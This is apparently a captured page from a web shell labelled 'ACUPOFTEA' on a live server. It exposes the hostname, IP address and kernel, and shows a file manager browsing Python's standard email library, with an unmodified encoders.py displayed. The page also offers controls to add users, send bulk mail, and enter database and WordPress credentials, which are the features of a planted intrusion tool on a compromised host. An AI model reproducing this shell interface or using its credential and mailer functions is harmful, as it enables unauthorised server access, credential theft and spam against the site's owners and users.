System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
email
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
encoders.py
# Copyright (C) 2001-2006 Python Software Foundation # Author: Barry Warsaw # Contact: email-sig@python.org """Encodings and related functions.""" __all__ = [ 'encode_7or8bit', 'encode_base64', 'encode_noop', 'encode_quopri', ] import base64 from quopri import encodestring as _encodestring def _qencode(s): enc = _encodestring(s, quotetabs=True) # Must encode spaces, which quopri.encodestring() doesn't do return enc.replace(' ', '=20') def _bencode(s): # We can't quite use base64.encodestring() since it tacks on a "courtesy # newline". Blech! if not s: return s hasnewline = (s[-1] == '\n') value = base64.encodestring(s) if not hasnewline and value[-1] == '\n': return value[:-1] return value def encode_base64(msg): """Encode the message's payload in Base64. Also, add an appropriate Content-Transfer-Encoding header. """ orig = msg.get_payload() encdata = _bencode(orig) msg.set_payload(encdata) msg['Content-Transfer-Encoding'] = 'base64' def encode_quopri(msg): """Encode the message's payload in quoted-printable. Also, add an appropriate Content-Transfer-Encoding header. """ orig = msg.get_payload() encdata = _qencode(orig) msg.set_payload(encdata) msg['Content-Transfer-Encoding'] = 'quoted-printable' def encode_7or8bit(msg): """Set the Content-Transfer-Encoding header to 7bit or 8bit.""" orig = msg.get_payload() if orig is None: # There's no payload. For backwards compatibility we use 7bit msg['Content-Transfer-Encoding'] = '7bit' return # We play a trick to make this go fast. If encoding to ASCII succeeds, we # know the data must be 7bit, otherwise treat it as 8bit. try: orig.encode('ascii') except UnicodeError: msg['Content-Transfer-Encoding'] = '8bit' else: msg['Content-Transfer-Encoding'] = '7bit' def encode_noop(msg): """Do nothing."""
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
mime
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
__init__.py
text/x-python
2.79 KB
-rw-r--r--
2024-04-10 04:58:35
__init__.pyc
application/octet-stream
2.8 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/octet-stream
2.8 KB
-rw-r--r--
2024-04-10 04:58:46
_parseaddr.py
text/x-python
15.76 KB
-rw-r--r--
2024-04-10 04:58:35
_parseaddr.pyc
application/octet-stream
13.57 KB
-rw-r--r--
2024-04-10 04:58:46
_parseaddr.pyo
application/octet-stream
13.57 KB
-rw-r--r--
2024-04-10 04:58:46
base64mime.py
text/x-python
5.66 KB
-rw-r--r--
2024-04-10 04:58:35
base64mime.pyc
application/octet-stream
5.2 KB
-rw-r--r--
2024-04-10 04:58:46
base64mime.pyo
application/octet-stream
5.2 KB
-rw-r--r--
2024-04-10 04:58:46
charset.py
text/x-python
15.67 KB
-rw-r--r--
2024-04-10 04:58:35
charset.pyc
application/octet-stream
13.22 KB
-rw-r--r--
2024-04-10 04:58:46
charset.pyo
application/octet-stream
13.18 KB
-rw-r--r--
2024-04-10 04:58:43
encoders.py
text/x-python
1.97 KB
-rw-r--r--
2024-04-10 04:58:35
encoders.pyc
application/octet-stream
2.18 KB
-rw-r--r--
2024-04-10 04:58:46
encoders.pyo
application/octet-stream
2.18 KB
-rw-r--r--
2024-04-10 04:58:46
errors.py
text/x-python
1.59 KB
-rw-r--r--
2024-04-10 04:58:35
errors.pyc
application/octet-stream
3.45 KB
-rw-r--r--
2024-04-10 04:58:46
errors.pyo
application/octet-stream
3.45 KB
-rw-r--r--
2024-04-10 04:58:46
feedparser.py
text/x-python
20.01 KB
-rw-r--r--
2024-04-10 04:58:35
feedparser.pyc
application/octet-stream
10.88 KB
-rw-r--r--
2024-04-10 04:58:46
feedparser.pyo
application/octet-stream
10.79 KB
-rw-r--r--
2024-04-10 04:58:43
generator.py
text/x-python
13.87 KB
-rw-r--r--
2024-04-10 04:58:35
generator.pyc
application/octet-stream
10.14 KB
-rw-r--r--
2024-04-10 04:58:46
generator.pyo
application/octet-stream
10.14 KB
-rw-r--r--
2024-04-10 04:58:46
header.py
text/x-python
21.72 KB
-rw-r--r--
2024-04-10 04:58:35
header.pyc
application/octet-stream
13.34 KB
-rw-r--r--
2024-04-10 04:58:46
header.pyo
application/octet-stream
13.27 KB
-rw-r--r--
2024-04-10 04:58:43
iterators.py
text/x-python
2.15 KB
-rw-r--r--
2024-04-10 04:58:35
iterators.pyc
application/octet-stream
2.31 KB
-rw-r--r--
2024-04-10 04:58:46
iterators.pyo
application/octet-stream
2.31 KB
-rw-r--r--
2024-04-10 04:58:46
message.py
text/x-python
30 KB
-rw-r--r--
2024-04-10 04:58:35
message.pyc
application/octet-stream
28 KB
-rw-r--r--
2024-04-10 04:58:46
message.pyo
application/octet-stream
28 KB
-rw-r--r--
2024-04-10 04:58:46
parser.py
text/x-python
3.22 KB
-rw-r--r--
2024-04-10 04:58:35
parser.pyc
application/octet-stream
3.74 KB
-rw-r--r--
2024-04-10 04:58:46
parser.pyo
application/octet-stream
3.74 KB
-rw-r--r--
2024-04-10 04:58:46
quoprimime.py
text/x-python
10.59 KB
-rw-r--r--
2024-04-10 04:58:35
quoprimime.pyc
application/octet-stream
8.64 KB
-rw-r--r--
2024-04-10 04:58:46
quoprimime.pyo
application/octet-stream
8.64 KB
-rw-r--r--
2024-04-10 04:58:46
utils.py
text/x-python
9.79 KB
-rw-r--r--
2024-04-10 04:58:35
utils.pyc
application/octet-stream
9.11 KB
-rw-r--r--
2024-04-10 04:58:46
utils.pyo
application/octet-stream
9.11 KB
-rw-r--r--
2024-04-10 04:58:46
~ ACUPOFTEA - mail.ontime-ae.com